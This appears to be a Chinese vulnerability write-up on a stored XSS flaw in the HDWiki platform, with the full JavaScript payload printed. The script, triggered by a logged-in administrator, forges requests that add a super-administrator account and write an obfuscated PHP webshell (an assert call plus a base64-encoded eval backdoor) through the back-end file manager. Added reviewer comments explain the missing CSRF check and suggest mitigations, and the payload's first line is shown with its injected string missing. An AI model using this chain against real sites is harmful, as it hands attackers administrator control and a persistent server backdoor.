HDWiki 存储型 XSS 一枚

创建或编辑词条 存储型xss
使用 BURP 抓包并改包，在如下的位置插入
[php]
Content-Disposition: form-data; name="content"

------WebKitFormBoundaryWQNSVRn07IYXGeMN

[/php]
然后提交。

hdwiki 的管理员 cookie 无法直接进入后台以及执行其它后台操作
session 表中 islogin =2 才可以进后台
所以只有当管理员进入后台后再触发时，才有机率添加一个超级管理员并拿到 shell
xss.js
[php]
// NOTE(review): the string argument below is shown empty in this rendering — the
// original text appears to have been stripped by the page, so as displayed this
// statement is not valid JavaScript (raw newlines inside a quoted string).
document.writeln("

");
// Builds an XHR object: the native XMLHttpRequest when the window exposes one,
// otherwise the legacy ActiveX ProgIDs are tried in order. Returns false when
// neither mechanism is available.
function ajax(){
if (window.XMLHttpRequest) {
    return new XMLHttpRequest();
}
var xhr = false;
if (window.ActiveXObject) {
    var progIds = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    var k = 0;
    // Every ProgID is attempted; the last one that instantiates wins (no early exit).
    while (k < progIds.length) {
        try {
            xhr = new ActiveXObject(progIds[k]);
        } catch (err) {}
        k++;
    }
}
return xhr;
}
// Shared XHR object used by xhr_act(); both requests below run synchronously, in order.
var _x = ajax();
// Executes as soon as the script runs in the viewer's browser — both actions ride on
// the viewer's session, which is why the page notes it only succeeds when an admin
// holding a back-end session (islogin=2) triggers it.
add(); shell();
function add() {
// Forged request to the user-add back-end action, sent from the viewing admin's
// browser with that admin's session. The form fields below (id, username, password,
// email, groupid, submit) carry no anti-CSRF token, so the action appears to be
// accepted on the session alone — that is what lets a stored XSS become account creation.
// Mitigation: a per-session CSRF token checked on every admin POST, plus output
// escaping of the `content` field so the injected script never runs at all.
// Note: src and data are assigned without var, so they become implicit globals.
src="index.php?admin_user-add";
data="id=&username=admin_&password=admin_&email=admin_%40qq.com&groupid=4&submit=%C8%B7%B6%A8";
//add user=admin_ password=admin_
xhr_act("POST",src,data);
}
function shell() {
// Second forged request, to the back-end file manager's edit action. fname is an
// absolute server path (under what looks like a WAMP web root) and dir points at
// ./install/, i.e. the server is asked to write request-supplied content to a file
// the request itself names. The two comments below are the author's; the encoded
// content is left untouched here.
// Defender notes: if the handler honours an absolute fname from the request (the
// page implies it does), it should be restricted to an allowlisted directory below
// the web root and covered by the same CSRF check as other admin POSTs; any
// admin_filemanager-edit request whose fname lies outside the expected directory
// is a strong audit signal.
src="index.php?admin_filemanager-edit";
data="fname=D%3A%2Fwamp%2Fwww%2Fhdwiki%2Finstall%2Findex.php&dir=.%2Finstall%2F&content=%3C%3Fphp%0D%0Aarray_map%28%22ass%5Cx65rt%22%2C%28array%29%24_REQUEST%5B%27test%27%5D%29%3B%0D%0A%40fputs%28%40fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29%3B%0D%0Aheader%28%27location%3Ainstall.php%27%29%3B%0D%0A%09%0D%0A%3F%3E&dosubmit=+%C8%B7%C8%CF%D0%DE%B8%C4+";
//install/index.php test
//fopen c.php 1
xhr_act("POST",src,data);
}
// Synchronous XHR wrapper over the shared _x object created by ajax().
// _m: HTTP method, _s: URL, _a: request body, sent as-is.
// The third argument false makes open() synchronous, so send() blocks until the
// response has arrived and responseText is available on return.
function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
// Form-encoded content type only for POST; callers pass urlencoded strings.
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
}[/php]

后台登录后再查看就会发现
